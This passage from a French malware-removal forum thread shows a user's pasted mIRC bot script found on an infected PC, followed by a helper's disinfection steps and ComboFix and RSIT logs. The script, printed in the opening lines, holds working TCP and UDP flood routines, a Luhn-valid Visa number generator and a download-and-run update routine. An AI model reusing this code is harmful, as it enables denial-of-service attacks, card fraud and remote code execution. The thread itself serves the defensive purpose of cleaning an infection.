    alias tcpflood2 { sockopen tcpflood- $+ $ticks $+ $rand(a,z) $+ $rand(1000,9999) %tcpflood.ip %tcpflood.port | halt }
    on *:sockopen:tcpflood-*:{ sockwrite -n $sockname $str($chr($r(0,140)),800) | sockclose $sockname | halt }
    alias tcpflood.stop {
      .timertcp.* off
      sockclose tcpflood-*
      msg %chan [TCPFLOOD]: Flood stopped.
      halt
    }
    ;UDP FLOOD;
    alias udpflood {
      msg %chan [UDPFLOOD]: Flooding %udp.ip for %udp.secs seconds.
      .timerudp.flood 0 0.1 udpflood2
      if (%udp.secs != 0) { .timerudp.flood.stop 1 %udp.secs udpflood.stop }
    }
    alias udpflood2 {
      set %udp.rand udpflood- $+ $ticks $+ $rand(a,z) $+ $rand(1000,9999)
      sockudp -b %udp.rand %udp.ip $rand(1,65535) $rand(1,65535) $rand(1,65535) $str($chr($r(0,140)),800)
      sockclose %udp.rand
      halt
    }
    alias udpflood.stop {
      .timerudp.* off
      sockclose udpflood-*
      msg chan [UDPFLOOD]: Flood stopped.
      halt
    }
    ;CREDIT CARD;
    alias creditcard {
      var %a = 1 | while (%a <= 1) { msg %chan [VISA]: $visa_card_number(16) $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)   $rand(1,12) $+ / $+ $rand(9,11) | inc %a }
    }
    ; Visa credit card generator
    alias -l visa_card_number {
      var %left = 4, %mid, %a = 1
      while (%a <= $calc($$1 - 2)) {
        %mid = $+(%mid,$rand(0,9))
        inc %a
      }
      ; Done with the basic random stuff, now create the last digit that conforms to the 'mod 10 algorithm'
      var %body = $reverse($+(%left,%mid)), %a = 1, %b, %n1, %n2
      while (%a <= $len(%body)) {
        if ($int($calc(%a / 2)) = $calc(%a / 2)) {
          %n1 = $calc(%n1 + $mid(%body,%a,1))
        }
        else {
          %b = 2 * $mid(%body,%a,1)
          %n2 = $calc(%n2 + $iif(%b > 9, %b - 9, %b))
        }
        inc %a
      }
      var %right = $calc(($calc($int($calc((%n1 + %n2) / 10)) + 1) * 10) - (%n1 + %n2))
      return $+(%left,%mid,$iif(%right > 9, 0, %right))
    }
    alias -l reverse {
      var %a = $len($$1), %b
      while (%a) { %b = $+(%b,$mid($$1,%a,1)) | dec %a }
      return %b
    }
    ;DOWNDLOAD;
    alias download { sockclose dwl | sockopen dwl %downloadsite 80 }
    on *:sockopen:dwl:sockwrite -n dwl GET %path-to-file
    on *:sockread:dwl: {
      sockread &a
      bwrite download\ $+ %save-as-filename -1 -1 &a
    }
    ;UPDATE;
    alias update { sockclose update | sockopen update %downloadsite 80 }
    on *:sockopen:update:sockwrite -n update GET %path-to-file
    on *:sockread:update: {
      sockread &a
      bwrite download\ $+ %save-as-filename -1 -1 &a
    }
    on *:sockclose:update:run download\ $+ %save-as-filename
    ;COMMAND DOS;
    alias -l cecho {
      if (!$1) { echo 4 -at -[cecho\ $+ $nopath($script) $+ ]- Erreur: pas d'argument | return }
      elseif ($isfile($2) != $true) { return }
    }
      elseif ($hget(cecho,$2) < $lines($2)) { 
        if ($hget(loop,$1)) { hdel loop $1 }
        echo 14 @cmd => $read($2,$hget(cecho,$2)) | hinc -m cecho $2
    }
      else {
        hinc -m loop $2
        ; si le timer s'est execute moins de 500X dans le vide, on return
        if ($hget(loop,$2) < 500) { return }
        ; sinon on arrete tout (j'imagine que la comande doit etre finie...)
        hdel loop $2
        .remove $2 | .remove $replace($1,txt,bat)
        .timer $+ $2 off 
      }
      halt
    }
    ; simple alias qui retourne une chaine de X ($1) caractères aléatoires...
    alias -l _r {
      if (!$2) { return } | if (%return) { unset %return }
      %s = 1 | while (%s <= $2) { %return = %return $+ $r(a,z) | inc %s }
      return %return
    }


    T'ain c'est chaud ya de tout, du TCP Flooding au Key logger pour les sites d'achat ! :O
    J'ai déjà changé le script.dll a "exit" et le server.dll a "irc.quakenet.org"

    J'ai acheté mon billet de train après avoir eu ce virus, vous croyez que ça craint ?
    0
  4. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    je ne sais pas répondre à ta dernière question.

    De plus, si ça se trouve, tu déchiffre beaucoup mieux que moi le contenu du script.

    Tu as installé V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe­ ?

    (c'est quoi V:\)

    On va prendre une mesure conservatoire.

    Relance Hijackthis (en double cliquant sur C:\Program Files\trend micro\lml-mike.exe)

    Choisis Do a scan only

    Coche la case devant les lignes suivantes

    O4 - HKLM\..\Run: [mirc] C:\WINDOWS\Winend\mirc.exe

    Ferme toutes les fenêtres (hormis HijackThis), y compris ton navigateur.

    Clique sur fix checked.

    Ferme Hijackthis.

    Ton client irc ne devrait plus se lancer au démarrage.

    ===================

    On va l'analyser :

    ->Affiche tous les fichiers et dossiers :
    clique sur démarrer/panneau de configuration (en affichage classique)/option des dossiers/affichage

    [Coche] « afficher les dossiers et fichiers cachés »

    [Décoche] la case « Masquer les fichiers protégés du système d'exploitation (recommandé) »

    [Décoche] « masquer les extensions dont le type est connu »

    Puis fais [appliquer] pour valider les changements.

    Et [Ok]

    Rends toi sur ce site :

    https://www.virustotal.com/gui/

    Clique sur parcourir et cherche ce fichier : C:\WINDOWS\Winend\mirc.exe

    Clique sur Send File.

    Un rapport va s'élaborer ligne à ligne.

    Attends la fin. Il doit comprendre la taille du fichier envoyé.

    Sauvegarde le rapport avec le bloc-note.

    Copie le dans ta réponse.

    Si VirusTotal indique que le fichier a déjà été analysé, cliquer sur le bouton Reanalyse le fichier maintenant

    =====================

    Comme tu dois être sur une nouveauté, fais ceci :

    ouvre ce lien : https://www.broadcom.com/

    et soumets ton fichier zippé (celui du lien)

    (il faudra peut être que tu soumettes le fichier original)

    Donne moi la référence du rapport).

    =======================

    Envoie aussi le fichier ici : http://secubox.gateweb.org/mad.php

    ajoute : à la demande de Lyonnais92 et donne l'url de ce topic.

    ===========================

    On va utiliser ComboFix.exe. Rends toi sur cette page web pour obtenir les liens de téléchargement, ainsi que des instructions pour exécuter l'outil:

    https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

    * Vérifie que tu as fermé/désactivé tous les programmes anti-virus, anti-malware ou anti-spyware afin qu'ils n'interfèrent pas avec le travail de ComboFix.

    Envoie le contenu de C:\ComboFix.txt dans ta prochaine réponse afin que je l'examine.
    0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    Re,
    je ne sais pas répondre à ta dernière question.
    De plus, si ça se trouve, tu déchiffre beaucoup mieux que moi le contenu du script.
    Tu as installé V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe­­ ?
    (c'est quoi V:\)


    V est la lettre de mon 2ème disque dur "Videos"
    3DSMAX est un logiciel de 3D, mais je vois pas a quoi correspond le .exe que tu me donnes...
    __________________________________________________________________________

    Voici le rapport Threatexpert : (tiens bizarre, le code est pas interprété sous firefox mais sous IE oui :-) )

    http://lmlmike.free.fr/report.mhtml
    __________________________________________________________________________

    Voici le rapport comboFIX :
    (les petits bip et avertissements impressionnent :P)

    ComboFix 09-03-15.01 - lml-mike 2009-03-17 14:40:01.1 - NTFSx86
    Microsoft Windows XP Professionnel  5.1.2600.3.1252.1.1036.18.3007.2334 [GMT 1:00]
    Lancé depuis: c:\documents and settings\lml-mike\Bureau\ComboFix.exe
    AV: AVG Anti-Virus *On-access scanning enabled* (Updated)
     * Un nouveau point de restauration a été créé
    .
    [color=purple]Les fichiers ci-dessous ont été désactivés pendant l'exécution:[/color]
    c:\logs\SuperCopier2\SC2Hook.dll
    
    
    ((((((((((((((((((((((((((((((((((((   Autres suppressions   ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    
    c:\windows\system32\DKjSYcfe.ini
    c:\windows\system32\DKjSYcfe.ini2
    c:\windows\system32\hcgalvpf.ini
    c:\windows\system32\karmgybv.ini
    
    .
    (((((((((((((((((((((((((((((   Fichiers créés du 2009-02-17 au 2009-03-17  ))))))))))))))))))))))))))))))))))))
    .
    
    2009-03-17 12:41 . 2009-03-17 12:42	<REP>	d--------	C:\rsit
    2009-03-17 12:41 . 2009-03-17 14:26	<REP>	d--------	c:\program files\trend micro
    2009-03-09 13:11 . 2009-03-17 03:57	<REP>	d--------	c:\windows\Winend
    2009-03-03 18:39 . 1997-05-29 16:26	316,416	---------	c:\windows\IsUninst.Exe
    2009-03-03 18:38 . 2009-03-03 18:38	<REP>	d--------	c:\documents and settings\lml-mike\WINDOWS
    2009-03-03 18:38 . 1997-05-29 16:26	316,416	--a------	c:\windows\IsUn040c.exe
    2009-03-01 13:58 . 2009-03-01 13:58	43,520	--a------	c:\windows\system32\CmdLineExt03.dll
    2009-03-01 12:08 . 2009-03-10 13:26	<REP>	d--h-----	C:\$AVG8.VAULT$
    2009-02-28 16:11 . 2009-03-17 12:07	<REP>	d--------	c:\windows\system32\drivers\Avg
    2009-02-28 16:11 . 2009-02-28 16:11	<REP>	d--------	c:\program files\AVG
    2009-02-28 16:11 . 2009-03-17 08:35	325,640	--a------	c:\windows\system32\drivers\avgldx86.sys
    2009-02-28 16:11 . 2009-02-28 16:11	12,552	--a------	c:\windows\system32\drivers\avgrkx86.sys
    2009-02-28 16:11 . 2009-02-28 16:11	10,520	--a------	c:\windows\system32\avgrsstx.dll.old
    2009-02-28 16:11 . 2009-03-17 08:35	10,520	--a------	c:\windows\system32\avgrsstx.dll
    2009-02-21 08:48 . 2009-02-21 09:49	<REP>	d--------	c:\documents and settings\lml-mike\Application Data\DeepBurner
    2009-02-20 16:23 . 2009-02-20 16:23	0	--a------	c:\windows\ROUTE
    2009-02-20 16:12 . 2009-02-20 16:12	40	--a------	c:\windows\NAVIGMA.INI
    
    .
    ((((((((((((((((((((((((((((((((((   Compte-rendu de Find3M   ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2009-03-17 11:40	---------	d-----w	c:\documents and settings\lml-mike\Application Data\mIRC
    2009-03-17 02:01	---------	d-----w	c:\documents and settings\All Users\Application Data\Microsoft Help
    2009-03-16 23:41	---------	d-----w	c:\documents and settings\lml-mike\Application Data\teamspeak2
    2009-03-09 02:44	---------	d-----w	c:\program files\Fichiers communs\Wise Installation Wizard
    2009-03-09 02:44	---------	d-----w	c:\program files\AGEIA Technologies
    2009-03-09 02:43	---------	d-----w	c:\documents and settings\lml-mike\Application Data\HLSW
    2009-03-08 20:07	---------	d-----w	c:\documents and settings\lml-mike\Application Data\Skype
    2009-03-08 20:00	---------	d-----w	c:\documents and settings\lml-mike\Application Data\skypePM
    2009-03-08 00:11	409,600	----a-w	c:\windows\system32\wrap_oal.dll
    2009-03-08 00:11	114,688	----a-w	c:\windows\system32\OpenAL32.dll
    2009-03-06 19:54	---------	d-----w	c:\documents and settings\lml-mike\Application Data\Mumble
    2009-03-06 01:15	---------	d--h--w	c:\program files\InstallShield Installation Information
    2009-03-03 17:41	---------	d-----w	c:\documents and settings\lml-mike\Application Data\DAEMON Tools Pro
    2009-03-01 19:41	---------	d---a-w	c:\documents and settings\All Users\Application Data\TEMP
    2009-02-28 15:11	---------	d-----w	c:\documents and settings\All Users\Application Data\avg8
    2009-02-28 15:10	---------	d-----w	c:\program files\Fichiers communs\G DATA
    2009-02-21 06:59	120	----a-w	C:\drmHeader.bin
    2009-02-13 02:01	---------	d-----w	c:\program files\Microsoft SQL Server
    2009-02-12 00:31	278,528	----a-w	c:\windows\system32\TubeFinder.exe
    2009-02-09 14:05	1,846,912	----a-w	c:\windows\system32\win32k.sys
    2009-02-06 17:52	49,504	----a-w	c:\windows\system32\sirenacm.dll
    2009-02-04 21:05	---------	d-----w	c:\program files\Fichiers communs\Skype
    2009-02-04 21:05	---------	d-----w	c:\documents and settings\All Users\Application Data\Skype
    2009-02-04 21:05	---------	d-----r	c:\program files\Skype
    2009-02-04 20:07	---------	d-----w	c:\documents and settings\All Users\Application Data\Apple Computer
    2009-01-25 21:17	---------	d-----w	c:\program files\Microsoft
    2009-01-25 21:16	---------	d-----w	c:\program files\Windows Live SkyDrive
    2009-01-25 21:15	---------	d-----w	c:\program files\Windows Live
    2009-01-25 21:10	---------	d-----w	c:\program files\Fichiers communs\Windows Live
    2009-01-21 14:34	---------	d-----w	c:\documents and settings\lml-mike\Application Data\ScripterRon
    2009-01-18 20:43	---------	d-----w	c:\program files\Microsoft Games for Windows - LIVE
    2009-01-18 18:30	---------	d-----w	c:\documents and settings\All Users\Application Data\Fallout3
    2009-01-18 13:27	---------	d-----w	c:\program files\Fichiers communs\InstallShield
    2008-12-22 04:21	107,888	----a-w	c:\windows\system32\CmdLineExt.dll
    2008-12-20 22:47	826,368	----a-w	c:\windows\system32\wininet.dll
    2007-04-10 13:46	996,712	----a-w	c:\windows\inf\vVX6000.exe
    2007-04-10 13:46	509,288	----a-w	c:\windows\inf\VX6KTUI.dll
    2007-04-10 13:46	484,712	----a-w	c:\windows\inf\vVX6000.dll
    2007-04-10 13:46	36,328	----a-w	c:\windows\inf\VX6KCamd.sys
    2007-04-10 13:46	202,088	----a-w	c:\windows\inf\LCCoin14.dll
    2007-04-10 13:46	2,385,896	----a-w	c:\windows\inf\VX6000Xp.sys
    2007-04-10 13:46	185,704	----a-w	c:\windows\inf\cVX6000.dll
    2007-04-10 13:46	116,072	----a-w	c:\windows\inf\VX6000.dll
    2007-03-24 09:20	46,208	----a-w	c:\windows\inf\jraid.sys
    2007-03-20 10:45	479,232	----a-w	c:\windows\inf\PCCSWpdDriver.dll
    2007-03-20 10:37	831,048	----a-w	c:\windows\inf\WudfUpdate_01005.dll
    2007-02-23 03:25	581,632	----a-w	c:\windows\inf\nvhwvid.dll
    2007-02-22 09:15	90,624	----a-w	c:\windows\inf\nmwcdcls.dll
    2007-02-22 09:15	8,320	----a-w	c:\windows\inf\nmwcdc.sys
    2007-02-22 09:15	65,536	----a-w	c:\windows\inf\nmwcdcocls.dll
    2007-02-22 09:15	137,216	----a-w	c:\windows\inf\nmwcd.sys
    2007-02-22 09:15	12,288	----a-w	c:\windows\inf\nmwcdcm.sys
    2007-02-22 09:15	12,288	----a-w	c:\windows\inf\nmwcdcj.sys
    2007-01-16 01:16	303,104	----a-r	c:\windows\inf\smwdmif.dll
    2007-01-16 01:09	293,888	----a-r	c:\windows\inf\ADIHdAud.sys
    2006-12-18 13:34	868,352	----a-r	c:\windows\inf\smax4pnp.exe
    2006-12-08 09:06	139,776	----a-r	c:\windows\inf\adidts.sys
    2006-08-06 22:57	93,952	----a-r	c:\windows\inf\aeaudio.sys
    2006-07-26 06:56	248,832	----a-w	c:\windows\inf\yk51x86.sys
    2006-06-30 07:00	28,160	----a-r	c:\windows\inf\PostProc.dll
    2006-03-01 17:37	217,088	----a-r	c:\windows\inf\sis163u.sys
    2006-02-07 17:52	6,912	----a-w	c:\windows\inf\JGOGO.sys
    2005-01-07 16:07	138,752	----a-w	c:\windows\inf\Hdaudbus.sys
    2005-01-06 20:14	49,152	----a-r	c:\windows\inf\unwlsdrv.exe
    2004-08-13 02:56	5,810	----a-r	c:\windows\inf\ASACPI.sys
    2004-08-05 12:00	16,896	----a-w	c:\windows\inf\usbmon.dll
    2004-07-16 16:12	24,971	----a-r	c:\windows\inf\iteraid.sys
    2003-08-10 12:17	256,568	----a-w	c:\windows\inf\windrvr6.sys
    2003-03-09 20:31	94,208	----a-w	c:\windows\inf\HPZipt12.dll
    2003-03-09 20:31	65,795	----a-w	c:\windows\inf\HPZipm12.exe
    2003-03-09 20:31	61,699	----a-w	c:\windows\inf\HPZinw12.exe
    2003-03-09 20:31	57,344	----a-w	c:\windows\inf\HPZisn12.dll
    2003-03-09 20:31	51,024	----a-w	c:\windows\inf\hpzid412.sys
    2003-03-09 20:31	233,528	----a-w	c:\windows\inf\HPZidr12.dll
    2003-03-09 20:31	21,456	----a-w	c:\windows\inf\HPZius12.sys
    2003-03-09 20:31	167,936	----a-w	c:\windows\inf\HPZipr12.dll
    2003-03-09 20:31	16,080	----a-w	c:\windows\inf\HPZipr12.sys
    2003-03-09 20:30	430,080	----a-w	c:\windows\inf\hpztbx07.exe
    2003-03-09 20:30	237,568	----a-w	c:\windows\inf\HPZc3212.dll
    2003-03-09 20:30	155,699	----a-w	c:\windows\inf\hpzvip07.dll
    2003-03-09 04:31	36,864	----a-w	c:\windows\inf\hpofax08.dll
    2003-02-06 05:38	45,056	----a-w	c:\windows\inf\HPZimn12.dll
    .
    
    (((((((((((((((((((((((((((((((((   Points de chargement Reg   ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés 
    REGEDIT4
    
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"="c:\windows\system32\ctfmon.exe" [2008-04-13 15360]
    "msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2009-02-06 3885408]
    "BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="c:\program files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe" [2006-12-23 143360]
    "Orb"="c:\logs\Winamp Remote\bin\OrbTray.exe" [2008-04-01 507904]
    "SuperCopier2.exe"="c:\logs\SuperCopier2\SuperCopier2.exe" [2006-07-07 1052672]
    "PC Suite Tray"="c:\logs\Nokia\Nokia PC Suite 7\PCSuite.exe" [2008-12-03 1205760]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2006-12-18 868352]
    "NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-10-07 13574144]
    "WinampAgent"="c:\logs\Winamp\winampa.exe" [2008-04-01 36352]
    "DU Meter"="c:\logs\DU Meter\DUMeter.exe" [2003-06-22 1303552]
    "DiskeeperSystray"="c:\logs\Diskeeper\DkIcon.exe" [2004-10-04 176216]
    "NeroFilterCheck"="c:\program files\Fichiers communs\Ahead\Lib\NeroCheck.exe" [2006-01-12 155648]
    "LifeCam"="c:\program files\Microsoft LifeCam\LifeExp.exe" [2006-06-30 269104]
    "VX6000"="c:\windows\vVX6000.exe" [2006-06-30 994096]
    "HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" [2003-03-09 188416]
    "NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-10-07 86016]
    "SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2008-11-10 136600]
    "QuickTime Task"="c:\logs\QuickTime Alternative\QTTask.exe" [2009-01-05 413696]
    "AVG8_TRAY"="c:\logs\avg\avgtray.exe" [2009-03-17 1932568]
    "nwiz"="nwiz.exe" [2008-10-07 c:\windows\system32\nwiz.exe]
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-13 15360]
    
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
    2009-03-17 08:35 10520 c:\windows\system32\avgrsstx.dll
    
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
    "AppInit_DLLs"=antbve.dll
    
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "vidc.X264"= x264vfw.dll
    "vidc.DIV3"= DivXc32.dll
    "vidc.DIV4"= DivXc32f.dll
    "msacm.divxa32"= DivXa32.acm
    
    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "%windir%\\system32\\sessmgr.exe"=
    "%windir%\\Network Diagnostic\\xpnetdiag.exe"=
    "v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\counter-strike source\\hl2.exe"=
    "c:\\Logs\\HLSW\\hlsw.exe"=
    "c:\\Logs\\ABC\\abc.exe"=
    "v:\\Steam\\steam.exe"=
    "c:\\Program Files\\Fichiers communs\\Nokia\\Service Layer\\A\\nsl_host_process.exe"=
    "c:\\Program Files\\Nokia\\Nokia Software Updater\\nsu_ui_client.exe"=
    "c:\\WINDOWS\\system32\\mmc.exe"=
    "v:\\eMule\\emule.exe"=
    "c:\\Program Files\\Microsoft LifeCam\\LifeCam.exe"=
    "c:\\Program Files\\Microsoft LifeCam\\LifeExp.exe"=
    "v:\\Quake III Arena\\quake3.exe"=
    "c:\\Logs\\Mozilla Firefox\\firefox.exe"=
    "c:\\Logs\\FlashFXP\\flashfxp.exe"=
    "c:\\Logs\\Winamp Remote\\bin\\Orb.exe"=
    "c:\\Logs\\Winamp Remote\\bin\\OrbTray.exe"=
    "c:\\Logs\\Winamp Remote\\bin\\OrbStreamerClient.exe"=
    "v:\\Logs\\backburner\\monitor.exe"=
    "v:\\Logs\\backburner\\manager.exe"=
    "v:\\Logs\\backburner\\server.exe"=
    "v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\half-life 2 deathmatch\\hl2.exe"=
    "c:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
    "v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\synergy\\hl2.exe"=
    "v:\\Steam\\SteamApps\\lml_mike@hotmail.com\\zombie panic! source\\hl2.exe"=
    "c:\\Logs\\mIRC\\mirc.exe"=
    "c:\\Program Files\\Java\\jre6\\bin\\java.exe"=
    "c:\\Documents and Settings\\All Users\\Application Data\\Kaspersky Lab Setup Files\\Kaspersky Internet Security 2009\\English\\setup.exe"=
    "v:\\Shaun White Snowboarding\\ShaunWhiteSnowboardingGame.exe"=
    "v:\\Shaun White Snowboarding\\ShaunWhiteSnowboarding.exe"=
    "c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
    "c:\\Logs\\avg\\avgam.exe"=
    "c:\\Logs\\avg\\avgupd.exe"=
    "c:\\Documents and Settings\\lml-mike\\Application Data\\Macromedia\\Flash Player\\www.macromedia.com\\bin\\octoshape\\octoshape.exe"=
    "p:\\Prince of Persia\\Prince of Persia.exe"=
    "p:\\Prince of Persia\\PrinceOfPersia_Launcher.exe"=
    "c:\\Program Files\\Skype\\Phone\\Skype.exe"=
    "p:\\Mirror's Edge\\Binaries\\MirrorsEdge.exe"=
    "c:\\WINDOWS\\Winend\\mirc.exe"=
    "v:\\Steam\\SteamApps\\common\\left 4 dead\\left4dead.exe"=
    
    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
    "6112:TCP"= 6112:TCP:6112
    "6119:TCP"= 6119:TCP:6119
    "6112:UDP"= 6112:UDP:6112udp
    "6119:UDP"= 6119:UDP:6119udp
    "27015:TCP"= 27015:TCP:27015
    "27015:UDP"= 27015:UDP:27015
    
    R0 AvgRkx86;avgrkx86.sys;c:\windows\system32\drivers\avgrkx86.sys [2009-02-28 12552]
    R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2009-02-28 325640]
    R2 acedrv11;acedrv11;c:\windows\system32\drivers\ACEDRV11.sys [2008-01-23 501560]
    R2 avg8wd;AVG8 WatchDog;c:\logs\avg\avgwdsvc.exe [2009-02-28 298264]
    R2 GDTdiInterceptor;GDTdiInterceptor;c:\windows\system32\drivers\GDTdiIcpt.sys [2008-12-17 51016]
    S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2);c:\program files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
    S3 nmwcdnsu;Nokia USB Flashing Phone Parent;c:\windows\system32\drivers\nmwcdnsu.sys [2008-06-30 138112]
    S3 nmwcdnsuc;Nokia USB Flashing Generic;c:\windows\system32\drivers\nmwcdnsuc.sys [2008-06-30 8320]
    S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2007-11-06 34064]
    S3 VX6000;Microsoft LifeCam VX-6000;c:\windows\system32\drivers\VX6000Xp.sys [2008-07-03 2383152]
    
    --- Autres Services/Pilotes en mémoire ---
    
    *Deregistered* - mchInjDrv
    .
    Contenu du dossier 'Tâches planifiées'
    
    2009-03-04 c:\windows\Tasks\AppleSoftwareUpdate.job
    - c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
    .
    .
    ------- Examen supplémentaire -------
    .
    uStart Page = hxxp://google.mini20.com
    IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~4\Office12\EXCEL.EXE/3000
    TCP: {8F84AFEF-B3CB-49E5-9B29-54622F44CD90} = 192.168.1.1
    FF - ProfilePath - c:\documents and settings\lml-mike\Application Data\Mozilla\Firefox\Profiles\ihggds8b.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/ig?referrer=ign_n
    FF - component: c:\logs\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
    FF - plugin: c:\logs\Adobe\Reader 9.0\Reader\browser\nppdf32.dll
    FF - plugin: c:\logs\DivX\DivX Player\npDivxPlayerPlugin.dll
    FF - plugin: c:\logs\DivX\DivX Web Player\npdivx32.dll
    FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin.dll
    FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin2.dll
    FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin3.dll
    FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin4.dll
    FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin5.dll
    FF - plugin: c:\logs\Real Alternative\browser\plugins\nppl3260.dll
    FF - plugin: c:\logs\Real Alternative\browser\plugins\nprpjplug.dll
    FF - plugin: c:\logs\VLC\npvlc.dll
    .
    
    **************************************************************************
    
    catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2009-03-17 14:41:23
    Windows 5.1.2600 Service Pack 3 NTFS
    
    Recherche de processus cachés ... 
    
    Recherche d'éléments en démarrage automatique cachés ... 
    
    Recherche de fichiers cachés ... 
    
    Scan terminé avec succès
    Fichiers cachés: 0
    
    **************************************************************************
    
    [HKEY_LOCAL_MACHINE\System\ControlSet001\Services\mchInjDrv]
    "ImagePath"="\??\c:\docume~1\lml-mike\LOCALS~1\Temp\mc21.tmp"
    .
    --------------------- CLES DE REGISTRE BLOQUEES ---------------------
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\SecuROM\!CAUTION! NEVER A OR CHANGE ANY KEY*]
    "??"=hex:06,95,b7,b5,2c,db,43,08,c0,c4,40,b7,3a,f0,2a,05,8b,2b,28,6f,c9,ca,76,
       7f,e1,71,b4,1f,16,eb,7e,72,d6,61,d1,ab,bf,32,ad,76,1d,c1,da,b1,0b,db,e2,4f,\
    "??"=hex:35,fc,c6,3d,c9,02,ad,db,37,1f,61,de,0f,33,8f,50
    
    [HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\SecuROM\License information*]
    "datasecu"=hex:8d,b2,d3,fc,fb,ba,8b,ef,bc,39,76,bb,56,dd,bb,09,4a,9b,37,b4,76,
       41,4a,1a,f2,4d,98,46,c3,d3,79,8f,97,73,ff,5f,66,23,23,07,66,ed,b4,c9,f3,b7,\
    "rkeysecu"=hex:77,48,76,f9,7c,3c,d5,71,96,a9,9c,32,51,bb,d8,63
    .
    Heure de fin: 2009-03-17 14:42:29
    ComboFix-quarantined-files.txt  2009-03-17 13:42:27
    
    Avant-CF: 2 880 667 648 octets libres
    Après-CF: 3,629,477,888 octets libres
    
    WindowsXP-KB310994-SP2-Pro-BootDisk-FRA.exe
    [boot loader]
    timeout=2
    default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
    [operating systems]
    c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /noexecute=optin /fastdetect
    
    278	--- E O F ---	2009-03-17 02:04:45
    
    0
  7. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    le rapport de Threatexpert est très éclairant :

    https://www.symantec.com?md5=fbce76a95b969bd1c1c8bd2eb7013df8

    (cette forme est plus lisible que la copie).

    Le malware installe de manière pirate (le logiciel est payant, pas cher mais payant) un client irc connu (mIRC) (je l'utilise) et l'exécute automatiquement avec le script que tu as donné.

    C'est probablement lui le fichier malveillant.

    En fin de désinfection, je te conseille de changer tous tes mots de passe et de surveiller attentivement ton compte.

    =====================

    fais ceci :

    Télécharge ici :

    http://images.malwareremoval.com/random/RSIT.exe

    random's system information tool (RSIT) par random/random et sauvegarde-le sur le Bureau.

    Double-clique sur RSIT.exe afin de lancer RSIT.

    Lis le contenu de l'écran Disclaimer puis clique sur Continue (si tu acceptes les conditions).

    Si l'outil HijackThis (version à jour) n'est pas présent ou non détecté sur l'ordinateur, RSIT le téléchargera (autorise l'accès dans ton pare-feu, si demandé) et tu devras accepter la licence.

    Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront.

    Poste le contenu de info.txt (<<qui sera réduit dans la Barre des Tâches).

    NB : Les rapports sont sauvegardés dans le dossier C:\rsit
    0
  8. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    Merci encore !!!

    Voila le rapport :

    Logfile of random's system information tool 1.05 (written by random/random)
    Run by lml-mike at 2009-03-17 16:05:34
    Microsoft Windows XP Professionnel Service Pack 3
    System drive C: has 3 GB (17%) free of 20 GB
    Total RAM: 3007 MB (66% free)
    
    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 16:05:39, on 17/03/2009
    Platform: Windows XP SP3 (WinNT 5.01.2600)
